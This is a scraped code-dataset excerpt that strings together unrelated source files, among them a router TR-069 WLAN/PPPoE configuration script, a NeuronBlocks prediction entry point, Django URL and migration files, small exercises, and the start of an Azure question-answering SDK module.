                        os.path.basename(os.path.dirname(__file__)))
    # parameters passed in via data
WEPKeyIndex = obj.dict_data.get("WEPKeyIndex")[0]
WEPEncryptionLevel = obj.dict_data.get("WEPEncryptionLevel")[0]
WEPKey = obj.dict_data.get("WEPKey")[0]
    # WAN-related parameters
PVC_OR_VLAN1 = obj.dict_data.get("PVC_OR_VLAN1")[0]
PVC_OR_VLAN2 = obj.dict_data.get("PVC_OR_VLAN2")[0]
PVC_OR_VLAN3 = obj.dict_data.get("PVC_OR_VLAN3")[0]
PVC_OR_VLAN4 = obj.dict_data.get("PVC_OR_VLAN4")[0]
Username1 = obj.dict_data.get("Username1")[0]
Password1 = obj.dict_data.get("Password1")[0]
Username2 = obj.dict_data.get("Username2")[0]
Password2 = obj.dict_data.get("Password2")[0]
WANEnable_Switch = obj.dict_data.get("WANEnable_Switch")[0]
    # number of WLAN instances
Num = 4
BeaconType = 'Basic'
BasicAuthenticationMode = 'Both'
    # parameters of the LANDevice.{i}.WLANConfiguration.{i}. node
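    # each entry is [write_flag, value]: 1 writes the value, 0 with 'Null' skips
    # the node (inferred from how the worklist helpers use these dicts)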
dict_root = {'X_CT-COM_SSIDHide':[0, 'Null'],
'X_CT-COM_RFBand':[0, 'Null'],
'X_CT-COM_ChannelWidth':[0, 'Null'],
'X_CT-COM_GuardInterval':[0, 'Null'],
'X_CT-COM_RetryTimeout':[0, 'Null'],
'X_CT-COM_Powerlevel':[0, 'Null'],
'X_CT-COM_PowerValue':[0, 'Null'],
'X_CT-COM_APModuleEnable':[0, 'Null'],
'X_CT-COM_WPSKeyWord':[0, 'Null'],
'Enable':[1, '1'],
'Channel':[0, 'Null'],
'SSID':[0, 'Null'],
'BeaconType':[1, BeaconType],
'Standard':[0, 'Null'],
'WEPKeyIndex':[1, WEPKeyIndex],
'KeyPassphrase':[0, 'Null'],
'WEPEncryptionLevel':[1, WEPEncryptionLevel],
'BasicAuthenticationMode':[1, BasicAuthenticationMode],
'WPAEncryptionModes':[0, 'Null'],
'WPAAuthenticationMode':[0, 'Null'],
'IEEE11iEncryptionModes':[0, 'Null'],
'IEEE11iAuthenticationMode':[0, 'Null'],
'BasicDataTransmitRates':[0, 'Null'],
'OperationalDataTransmitRates':[0, 'Null']}
    # parameters of the WLANConfiguration.{i}.WEPKey.{i}. node (used by WEP)
    dict_WEPKey = {'WEPKey':[1, WEPKey]}
    # parameters of the WLANConfiguration.{i}.PreSharedKey.{i}. node (used by WPA)
    dict_PreSharedKey = {}
    # wireless setup (leave the 1st SSID unchanged, set the 2nd to WEP, the 3rd and 4th to no encryption)
ret, ret_data = WLANMulti(obj, sn, Num, dict_root,
dict_WEPKey, dict_PreSharedKey={},
change_account=0,
rollbacklist=rollbacklist)
    # merge the script execution result into the OBJ result
    obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data)
    # on failure, invoke the common rollback mechanism (disabled by default)
    if ret == ERR_FAIL:
        ret_rollback, ret_data_rollback = rollback(sn, rollbacklist, obj)
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data_rollback)
        info = u"Worklist: %s finished\n" % os.path.basename(os.path.dirname(__file__))
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
        return ret
    # create four WAN connections directly:
    # 1st: IP_Routed, PPPoE, INTERNET, bound to LAN1 and WLAN1
    # 2nd: IP_Routed, PPPoE, INTERNET, bound to LAN2 and WLAN2
    # 3rd: PPPoE_Bridged, INTERNET, bound to LAN3 and WLAN3
    # 4th: PPPoE_Bridged, INTERNET, bound to LAN4 and WLAN4
LAN1 = 'InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.1'
LAN2 = 'InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.2'
LAN3 = 'InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.3'
LAN4 = 'InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.4'
WLAN1 = 'InternetGatewayDevice.LANDevice.1.WLANConfiguration.1'
WLAN2 = 'InternetGatewayDevice.LANDevice.1.WLANConfiguration.2'
WLAN3 = 'InternetGatewayDevice.LANDevice.1.WLANConfiguration.3'
WLAN4 = 'InternetGatewayDevice.LANDevice.1.WLANConfiguration.4'
    # WANDSLLinkConfig node parameters for the 1st WAN
if PVC_OR_VLAN1 == "":
PVC_OR_VLAN1_flag = 0
else:
PVC_OR_VLAN1_flag = 1
dict_wanlinkconfig1 = {'Enable':[1, '1'],
'Mode':[PVC_OR_VLAN1_flag, '2'],
'VLANIDMark':[PVC_OR_VLAN1_flag, PVC_OR_VLAN1]}
    # WANPPPConnection node parameters for the 1st WAN
    # NOTE: some V4 firmware versions do not implement the X_CT-COM_IPMode node, so its
    # enable flag cannot be set to 1; the real Beiman worklists do not send it either
dict_wanpppconnection1 = {'Enable':[1, '1'],
'ConnectionType':[1, 'IP_Routed'],
'Name':[0, 'Null'],
'Username':[1, Username1],
'Password':[1, Password1],
'X_CT-COM_LanInterface':[1, LAN1+','+WLAN1],
'X_CT-COM_ServiceList':[1, 'INTERNET'],
'X_CT-COM_LanInterface-DHCPEnable':[0, 'Null']}
    # WANDSLLinkConfig node parameters for the 2nd WAN
if PVC_OR_VLAN2 == "":
PVC_OR_VLAN2_flag = 0
else:
PVC_OR_VLAN2_flag = 1
dict_wanlinkconfig2 = {'Enable':[1, '1'],
'Mode':[PVC_OR_VLAN2_flag, '2'],
'VLANIDMark':[PVC_OR_VLAN2_flag, PVC_OR_VLAN2]}
    # WANPPPConnection node parameters for the 2nd WAN
dict_wanpppconnection2 = {'Enable':[1, '1'],
'ConnectionType':[1, 'IP_Routed'],
'Name':[0, 'Null'],
'Username':[1, Username2],
'Password':[1, Password2],
'X_CT-COM_LanInterface':[1, LAN2+','+WLAN2],
'X_CT-COM_ServiceList':[1, 'INTERNET'],
'X_CT-COM_LanInterface-DHCPEnable':[0, 'Null']}
    # WANDSLLinkConfig node parameters for the 3rd WAN
if PVC_OR_VLAN3 == "":
PVC_OR_VLAN3_flag = 0
else:
PVC_OR_VLAN3_flag = 1
dict_wanlinkconfig3 = {'Enable':[1, '1'],
'Mode':[PVC_OR_VLAN3_flag, '2'],
'VLANIDMark':[PVC_OR_VLAN3_flag, PVC_OR_VLAN3]}
    # WANPPPConnection node parameters for the 3rd WAN
dict_wanpppconnection3 = {'Enable':[1, '1'],
'ConnectionType':[1, 'PPPoE_Bridged'],
'Name':[0, 'Null'],
'Username':[0, 'Null'],
'Password':[0, 'Null'],
'X_CT-COM_LanInterface':[1, LAN3+','+WLAN3],
'X_CT-COM_ServiceList':[1, 'INTERNET'],
'X_CT-COM_LanInterface-DHCPEnable':[0, 'Null']}
    # WANDSLLinkConfig node parameters for the 4th WAN
if PVC_OR_VLAN4 == "":
PVC_OR_VLAN4_flag = 0
else:
PVC_OR_VLAN4_flag = 1
dict_wanlinkconfig4 = {'Enable':[1, '1'],
'Mode':[PVC_OR_VLAN4_flag, '2'],
'VLANIDMark':[PVC_OR_VLAN4_flag, PVC_OR_VLAN4]}
    # WANPPPConnection node parameters for the 4th WAN
dict_wanpppconnection4 = {'Enable':[1, '1'],
'ConnectionType':[1, 'PPPoE_Bridged'],
'Name':[0, 'Null'],
'Username':[0, 'Null'],
'Password':[0, 'Null'],
'X_CT-COM_LanInterface':[1, LAN4+','+WLAN4],
'X_CT-COM_ServiceList':[1, 'INTERNET'],
'X_CT-COM_LanInterface-DHCPEnable':[0, 'Null']}
    # bring up the 1st PPPoE WAN connection
ret, ret_data = WLANMultiWANSetUP(obj, sn, WANEnable_Switch,
DeviceType, 'PPPoE',
PVC_OR_VLAN1, dict_wanlinkconfig1,
dict_wanpppconnection1,
dict_wanipconnection={},
change_account=0,
rollbacklist=rollbacklist)
    # merge the script execution result into the OBJ result
    obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data)
    # on failure, invoke the common rollback mechanism (disabled by default)
    if ret == ERR_FAIL:
        ret_rollback, ret_data_rollback = rollback(sn, rollbacklist, obj)
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data_rollback)
        info = u"Worklist: %s finished\n" % os.path.basename(os.path.dirname(__file__))
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
        return ret
    # bring up the 2nd PPPoE WAN connection
sleep(2)
ret, ret_data = WLANMultiWANSetUP(obj, sn, WANEnable_Switch,
DeviceType, 'PPPoE',
PVC_OR_VLAN2, dict_wanlinkconfig2,
dict_wanpppconnection2,
dict_wanipconnection={},
change_account=0,
rollbacklist=rollbacklist)
    # merge the script execution result into the OBJ result
    obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data)
    # on failure, invoke the common rollback mechanism (disabled by default)
    if ret == ERR_FAIL:
        ret_rollback, ret_data_rollback = rollback(sn, rollbacklist, obj)
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data_rollback)
        info = u"Worklist: %s finished\n" % os.path.basename(os.path.dirname(__file__))
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
        return ret
    # bring up the 3rd PPPoE_Bridged WAN connection
sleep(2)
ret, ret_data = WLANMultiWANSetUP(obj, sn, WANEnable_Switch,
DeviceType, 'PPPoE_Bridged',
PVC_OR_VLAN3, dict_wanlinkconfig3,
dict_wanpppconnection3,
dict_wanipconnection={},
change_account=0,
rollbacklist=rollbacklist)
    # merge the script execution result into the OBJ result
    obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data)
    # on failure, invoke the common rollback mechanism (disabled by default)
    if ret == ERR_FAIL:
        ret_rollback, ret_data_rollback = rollback(sn, rollbacklist, obj)
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data_rollback)
        info = u"Worklist: %s finished\n" % os.path.basename(os.path.dirname(__file__))
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
        return ret
    # bring up the 4th PPPoE_Bridged WAN connection
sleep(2)
ret, ret_data = WLANMultiWANSetUP(obj, sn, WANEnable_Switch,
DeviceType, 'PPPoE_Bridged',
PVC_OR_VLAN4, dict_wanlinkconfig4,
dict_wanpppconnection4,
dict_wanipconnection={},
change_account=1,
rollbacklist=rollbacklist)
    # merge the script execution result into the OBJ result
    obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data)
    # on failure, invoke the common rollback mechanism (disabled by default)
    if ret == ERR_FAIL:
        ret_rollback, ret_data_rollback = rollback(sn, rollbacklist, obj)
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data_rollback)
    info = u"Worklist: %s finished\n" % os.path.basename(os.path.dirname(__file__))
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
return ret
if __name__ == '__main__':
log_dir = g_prj_dir
log.start(name="nwf", directory=log_dir, level="DebugWarn")
log.set_file_id(testcase_name="tr069")
obj = MsgWorklistExecute(id_="1")
obj.sn = "2013012901"
dict_data= {"WEPKeyIndex":("1","1"),"WEPEncryptionLevel":("40-bit","2"),
"WEPKey":("0123456789","3"),
"PVC_OR_VLAN1":("71","4"),"Username1":("TW71","5"),
"Password1":("TW71","6"),
"PVC_OR_VLAN2":("72","7"),"Username2":("TW72","8"),
"Password2":("TW72","9"), "PVC_OR_VLAN3":("73","10"),
"PVC_OR_VLAN4":("74","11"),"WANEnable_Switch":("1","12")}
obj.dict_data = dict_data
try:
ret = test_script(obj)
if ret == ERR_SUCCESS:
            print u"Test passed"
        else:
            print u"Test failed"
        print "****************************************"
        print obj.dict_ret["str_result"]
    except Exception, e:
        print u"Test raised an exception"
| [
"[email protected]"
] | |
1b33a0d2e211750824ab74b353f3eec8b0a32f06 | 6e2dfbf50c1def19cd6ae8e536a2ddb954a5ad63 | /predict.py | 3e96f112a8763f74066d46caa470404c48356c44 | [
"BSD-3-Clause",
"LGPL-2.1-or-later",
"MIT",
"GPL-3.0-only",
"Apache-2.0"
] | permissive | boshining/NeuronBlocks | 9d71f087772eb17c3a4130d0374818cfd80d976f | 74fbb8658fb3f1cffea5c9bc84b2a1da59c20dd9 | refs/heads/master | 2020-05-27T16:24:10.244042 | 2019-08-06T07:37:55 | 2019-08-06T07:37:55 | 188,699,703 | 0 | 0 | MIT | 2019-08-06T08:19:55 | 2019-05-26T15:23:06 | Python | UTF-8 | Python | false | false | 3,096 | py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.
from settings import ProblemTypes, version
import os
import argparse
import logging
from ModelConf import ModelConf
from problem import Problem
from LearningMachine import LearningMachine
def main(params):
conf = ModelConf('predict', params.conf_path, version, params, mode=params.mode)
problem = Problem('predict', conf.problem_type, conf.input_types, None,
with_bos_eos=conf.add_start_end_for_seq, tagging_scheme=conf.tagging_scheme, tokenizer=conf.tokenizer,
remove_stopwords=conf.remove_stopwords, DBC2SBC=conf.DBC2SBC, unicode_fix=conf.unicode_fix)
if os.path.isfile(conf.saved_problem_path):
problem.load_problem(conf.saved_problem_path)
logging.info("Problem loaded!")
logging.debug("Problem loaded from %s" % conf.saved_problem_path)
else:
raise Exception("Problem does not exist!")
if len(conf.predict_fields_post_check) > 0:
for field_to_chk in conf.predict_fields_post_check:
field, target = field_to_chk.split('@')
if not problem.output_dict.has_cell(target):
raise Exception("The target %s of %s does not exist in the training data." % (target, field_to_chk))
lm = LearningMachine('predict', conf, problem, vocab_info=None, initialize=False, use_gpu=conf.use_gpu)
lm.load_model(conf.previous_model_path)
logging.info('Predicting %s with the model saved at %s' % (conf.predict_data_path, conf.previous_model_path))
lm.predict(conf.predict_data_path, conf.predict_output_path, conf.predict_file_columns, conf.predict_fields)
logging.info("Predict done! The predict result: %s" % conf.predict_output_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Prediction')
parser.add_argument("--conf_path", type=str, help="configuration path")
parser.add_argument("--predict_data_path", type=str, help='specify another predict data path, instead of the one defined in configuration file')
parser.add_argument("--previous_model_path", type=str, help='load model trained previously.')
parser.add_argument("--predict_output_path", type=str, help='specify another prediction output path, instead of conf[outputs][save_base_dir] + conf[outputs][predict_output_name] defined in configuration file')
parser.add_argument("--log_dir", type=str)
parser.add_argument("--batch_size", type=int, help='batch_size of each gpu')
parser.add_argument("--mode", type=str, default='normal', help='normal|philly')
parser.add_argument("--force", type=bool, default=False, help='Allow overwriting if some files or directories already exist.')
parser.add_argument("--disable_log_file", type=bool, default=False, help='If True, disable log file')
parser.add_argument("--debug", type=bool, default=False)
params, _ = parser.parse_known_args()
assert params.conf_path, 'Please specify a configuration path via --conf_path'
if params.debug is True:
import debugger
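    # Typical invocation sketch (paths are illustrative):
    #   python predict.py --conf_path model_zoo/demo/conf.json \
    #       --previous_model_path models/model.nb --predict_data_path data/test.tsv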
main(params) | [
"[email protected]"
] | |
c6ddac9e303b762b38d565c374ec231de78f1052 | aac63f0f178945e8109f74ebb9bbb59165185172 | /news/urls.py | e0d7f3b27f0854cb4fa0912eb93b73f36dddd8c4 | [] | no_license | okumujustine/hacker-news-clone | 587f7e88f53d576ee58e5dfff78f4d18e046b4db | 7f70d18325c7627237de719e04bdde9ad75a8d5d | refs/heads/main | 2023-01-02T13:41:37.825072 | 2020-11-04T14:52:41 | 2020-11-04T14:52:41 | 310,032,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py |
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views
from apps.core.views import signup
from apps.story.views import frontpage, search, submit, newest, vote, story
urlpatterns = [
path('', frontpage, name='frontpage'),
path('s/<int:story_id>/vote/', vote, name='vote'),
path('s/<int:story_id>/', story, name='story'),
path('u/', include('apps.userprofile.urls')),
path('newest/', newest, name='newest'),
path('search/', search, name='search'),
path('submit/', submit, name='submit'),
path('signup/', signup, name='signup'),
path('login/', views.LoginView.as_view(template_name='core/login.html'), name='login'),
path('logout/', views.LogoutView.as_view(), name='logout'),
path('admin/', admin.site.urls),
]
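# Example of resolving the named routes above (illustrative):
#   from django.urls import reverse
#   reverse('story', kwargs={'story_id': 1})  # -> '/s/1/'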
| [
"[email protected]"
] | |
fc6b3d226bbf27414b9873a6166718c97218c228 | 16fcf452e6165a0de5bc540c57b6e6b82d822bb1 | /Learntek_code/4_June_18/while2.py | 7a9891325874d47ce4779e35a821980c21e374a2 | [] | no_license | mohitraj/mohitcs | e794e9ad2eb536e3b8e385fb8d222e8ade95c802 | d6399b2acf69f5667c74f69715a0b55060bf19d1 | refs/heads/master | 2021-09-09T00:21:23.099224 | 2021-09-07T16:39:07 | 2021-09-07T16:39:07 | 87,798,669 | 5 | 6 | null | null | null | null | UTF-8 | Python | false | false | 356 | py | import getpass
print "Hello World "
print "Please enter the password\t"
pass1 = getpass.getpass()
num = 0  # counts failed attempts; three wrong tries end the loop
while True:
if pass1=="India":
print "Welcome in India"
break
else :
print "Wrong password type again"
num = num+1
print num
if num==3:
break
print "Please enter the password again\t"
pass1 = getpass.getpass() | [
"[email protected]"
] | |
525379ed03b39dc09421131f1b21c85a278b744d | ab1f25e6266a71ea23f1d3e04ec8635ae550d1df | /HW6/Task-1/temp_HW6/person.py | 9dc7cb45a9f296a612d9c858867a544884bb3914 | [] | no_license | Pavlenkovv/e-commerce | 5143d897cf779007181a7a7b85a41acf3dfc02c4 | 0d04d7dfe3353716db4d9c2ac55b0c9ba54daf47 | refs/heads/master | 2023-01-25T03:13:41.238258 | 2020-12-06T22:16:53 | 2020-12-06T22:16:53 | 313,103,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | class Person:
"""Any Person"""
def __init__(self, surname=None, name=None, age=None, *args, **kwargs):
self.surname = surname
self.name = name
self.age = age
def __str__(self):
return f'Surname: {self.surname}, name: {self.name}, age: {self.age}'
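# Minimal usage sketch (values are illustrative):
# p = Person(surname='Smith', name='Anna', age=30)
# print(p)  # -> Surname: Smith, name: Anna, age: 30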
| [
"[email protected]"
] | |
1dee9eaec67b0c0952431a177322b33833f669d8 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/detection/GCNet/dependency/mmdet/models/detectors/point_rend.py | e9d1d4b639d2027b566b58ab2b44017d39b48e54 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 1,366 | py | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from ..builder import DETECTORS
from .two_stage import TwoStageDetector
@DETECTORS.register_module()
class PointRend(TwoStageDetector):
"""PointRend: Image Segmentation as Rendering
This detector is the implementation of
`PointRend <https://arxiv.org/abs/1912.08193>`_.
"""
def __init__(self,
backbone,
rpn_head,
roi_head,
train_cfg,
test_cfg,
neck=None,
pretrained=None):
super(PointRend, self).__init__(
backbone=backbone,
neck=neck,
rpn_head=rpn_head,
roi_head=roi_head,
train_cfg=train_cfg,
test_cfg=test_cfg,
pretrained=pretrained)
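# A minimal mmdet-style config sketch for this detector (values are illustrative;
# the official configs/point_rend files define the complete model):
# model = dict(
#     type='PointRend',
#     backbone=dict(type='ResNet', depth=50),
#     neck=dict(type='FPN', in_channels=[256, 512, 1024, 2048], out_channels=256, num_outs=5),
#     rpn_head=dict(type='RPNHead', in_channels=256),
#     roi_head=dict(type='PointRendRoIHead'))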
| [
"[email protected]"
] | |
1f67fe7255fb1282c3fcc2652a59677474c9bda8 | 784936ad8234b5c3c20311ce499551ee02a08879 | /lab4/patterns/pattern04.py | 3fcf0f3989546c699ae05960faf3d52c1bb8cec2 | [] | no_license | jonlin97/CPE101 | 100ba6e5030364d4045f37e317aa05fd6a06cb08 | 985d64497a9861f59ab7473322b9089bfa57fd10 | refs/heads/master | 2021-06-16T01:31:31.025153 | 2017-02-28T19:29:11 | 2017-02-28T19:29:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | import driver
def letter(row, col):
if row in [2,3,4] and col in [3,4,5,6]:
return 'M'
else:
return 'S'
if __name__ == '__main__':
driver.comparePatterns(letter)
| [
"[email protected]"
] | |
1ca12f40b6da6c54896751b8fdc0c2ed2ce7ded5 | d2fb1de19bb55e3b03db94b4fdce396fe56a223e | /caesure/ecdsa_secp256k1.py | a24f78a2d48632ae1799cf42702c8927e03412a2 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | mikegogulski/caesure | 83a2a0a5d9b7c16339d54076bc54d351dbe0c3e4 | ccee420665e3fb4e7a005241efc6832ead4b90d8 | refs/heads/master | 2021-01-22T00:02:40.058902 | 2014-11-04T05:54:25 | 2014-11-04T05:54:25 | 26,273,215 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | # -*- Mode: Python -*-
import caesure.secp256k1
from bitcoin import dhash
class KEY:
def __init__ (self):
self.p = None
def set_pubkey (self, key):
self.p = key
def verify (self, data, sig):
return caesure.secp256k1.verify (self.p, dhash (data), sig)
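# Hypothetical usage (the byte strings are placeholders; dhash is applied to the
# data internally before verification):
# k = KEY()
# k.set_pubkey (pubkey_bytes)
# ok = k.verify (signed_data, der_signature)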
| [
"[email protected]"
] | |
d99ff535dc1910cb9019d6f11a9939d50cc55669 | acb7228022a36218846bc3f431e7a45057bb581d | /mappingpedia/migrations/0003_auto_20180214_1501.py | 9c5d9d620a594b0c3db4110b7ac1bfa980b4358a | [
"Apache-2.0"
] | permissive | oeg-upm/mappingpedia-userinterface | c6ba106f3072a4d37c1c34573e2d72882429dd1b | 1738b32f704bbf66f1ed8b78c99c71d49b208d43 | refs/heads/master | 2021-11-03T14:34:39.044575 | 2019-04-26T07:02:11 | 2019-04-26T07:02:11 | 111,107,643 | 3 | 1 | Apache-2.0 | 2018-02-28T11:55:04 | 2017-11-17T13:40:44 | HTML | UTF-8 | Python | false | false | 692 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-02-14 15:01
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mappingpedia', '0002_auto_20180214_1409'),
]
operations = [
migrations.RenameField(
model_name='executionprogress',
old_name='result_page',
new_name='result_url',
),
migrations.AlterField(
model_name='executionprogress',
name='timestamp',
field=models.DateTimeField(default=datetime.datetime(2018, 2, 14, 15, 0, 54, 799127)),
),
]
| [
"[email protected]"
] | |
f1da8b2e8cd2b49b4089ef7c8d1561bd7405bb9c | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/380/usersdata/348/85739/submittedfiles/testes.py | 6041d85fcddfaab01edb49cb3b652c18ffee68af | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | b = 0
a = 100
for i in range(0,a,1):
if (a%(i+1)) !=0:
b = b + 1
print(b)
| [
"[email protected]"
] | |
ea35143cdc0111cd7637ce9c09e8694f82c80c7d | 3d91c09bca4e68bf7a527cb40ed70ac208495b93 | /library/migrations/0004_auto_20201128_0844.py | faa172d3cb83cc52c23cfb2b00723338c7b633e8 | [] | no_license | Kaik-a/OCR-Projet13 | 02e9d8c9228d6d7a09013b4ab2570304c01dfc28 | ac339002279397f43316e33a869cce797b5d92b2 | refs/heads/main | 2023-02-17T09:39:11.184120 | 2021-01-11T15:50:58 | 2021-01-11T15:50:58 | 311,875,691 | 0 | 0 | null | 2021-01-11T15:50:59 | 2020-11-11T05:51:34 | CSS | UTF-8 | Python | false | false | 368 | py | # Generated by Django 3.1.3 on 2020-11-28 08:44
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("library", "0003_auto_20201128_0823"),
]
operations = [
migrations.AlterUniqueTogether(
name="lendedgame",
unique_together={("owned_game", "return_date")},
),
]
| [
"[email protected]"
] | |
7f271a553860b8386270632196e05e93106e5631 | 5cbf6cf8a9eb958391c371c6181c49155533b6ba | /leetcode_链表_18.排序链表(快排+归并).py | 4825959173e4f80a6369e29f6246967d3a75fdf9 | [] | no_license | cmychina/Leetcode | dec17e6e5eb25fad138a24deba1d2f087db416f7 | 18e6ac79573b3f535ca5e3eaa477eac0e60bf510 | refs/heads/master | 2022-12-20T16:09:46.709808 | 2020-09-28T04:04:54 | 2020-09-28T04:04:54 | 282,446,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,223 | py | """
Quicksort and merge sort on a linked list
"""
from linklist import *
class Solution:
def sortList(self, head: ListNode) -> ListNode:
"""
        Merge sort: find the middle of the list with fast/slow pointers
:param head:
:return:
"""
if not head or not head.next:
return head
slow,fast=head,head
while fast.next and fast.next.next:
slow=slow.next
fast=fast.next.next
right=self.sortList(slow.next)
        slow.next=None  # cut the list into two halves
left=self.sortList(head)
return self.mergesort(left,right)
def mergesort(self,head1,head2):
ans=ListNode(-1)
pre=ans
while head1 and head2:
if head1.val<=head2.val:
pre.next=head1
head1=head1.next
pre=pre.next
else:
pre.next=head2
head2=head2.next
pre=pre.next
if head1:
pre.next=head1
if head2:
pre.next=head2
return ans.next
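# NOTE: the second Solution class below shadows the merge-sort version above, so
# the __main__ block at the bottom exercises the quicksort implementation.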
class Solution:
def sortList(self, head: ListNode) -> ListNode:
"""
        Quicksort
:param head:
:return:
"""
if not head or not head.next:
return head
ans = ListNode(-1)
ans.next = head
return self.quicksort(ans, None)
def quicksort(self, head, end):
if head == end or head.next == end or head.next.next == end:
return head
tmp = ListNode(-1)
partition = head.next
p = partition
        # t walks the tmp dummy list, collecting nodes smaller than the pivot
t = tmp
while p.next!=end:
if p.next.val < partition.val:
t.next = p.next
t = t.next
p.next = p.next.next
            # value >= partition.val: leave the node in place
else:
p = p.next
        t.next = head.next  # head.next still points at the pivot's unmoved chain
head.next = tmp.next
self.quicksort(head, partition)
self.quicksort(partition, end)
return head.next
if __name__=="__main__":
a=[4,5,3,6,1,7,8,2]
l1=convert.list2link(a)
s=Solution()
out=s.sortList(l1)
print(convert.link2list(out))
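    # expected output: [1, 2, 3, 4, 5, 6, 7, 8]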
| [
"[email protected]"
] | |
b277f0d27a1a1bc16d0c56b6ca8d5a27cbcb6c93 | 974c5a4f101d0e6f4dfa5fc2f7c641c9d2bd8184 | /sdk/cognitivelanguage/azure-ai-language-questionanswering/azure/ai/language/questionanswering/authoring/aio/_operations/_operations.py | 0e46617f5d1c327c085652d1db7dc3c6ae718e0c | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | gaoyp830/azure-sdk-for-python | 4816f04c554dcffb7510a6b7044b0c86a2dd32e1 | 1c66defa502b754abcc9e5afa444ca03c609342f | refs/heads/master | 2022-10-20T21:33:44.281041 | 2022-09-29T17:03:13 | 2022-09-29T17:03:13 | 250,355,505 | 0 | 0 | MIT | 2020-03-26T19:42:13 | 2020-03-26T19:42:12 | null | UTF-8 | Python | false | false | 153,782 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, AsyncIterable, Callable, Dict, IO, List, Optional, TypeVar, Union, cast, overload
from urllib.parse import parse_qs, urljoin, urlparse
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.polling.async_base_polling import AsyncLROBasePolling
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from ..._operations._operations import (
build_add_feedback_request,
build_create_project_request,
build_delete_project_request,
build_deploy_project_request,
build_export_request,
build_get_project_details_request,
build_import_assets_request,
build_list_deployments_request,
build_list_projects_request,
build_list_qnas_request,
build_list_sources_request,
build_list_synonyms_request,
build_update_qnas_request,
build_update_sources_request,
build_update_synonyms_request,
)
from .._vendor import MixinABC
if sys.version_info >= (3, 9):
from collections.abc import MutableMapping
else:
from typing import MutableMapping # type: ignore # pylint: disable=ungrouped-imports
JSON = MutableMapping[str, Any] # pylint: disable=unsubscriptable-object
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class QuestionAnsweringAuthoringClientOperationsMixin(MixinABC): # pylint: disable=too-many-public-methods
@distributed_trace
def list_projects(
self, *, top: Optional[int] = None, skip: Optional[int] = None, **kwargs: Any
) -> AsyncIterable[JSON]:
"""Gets all projects for a user.
See
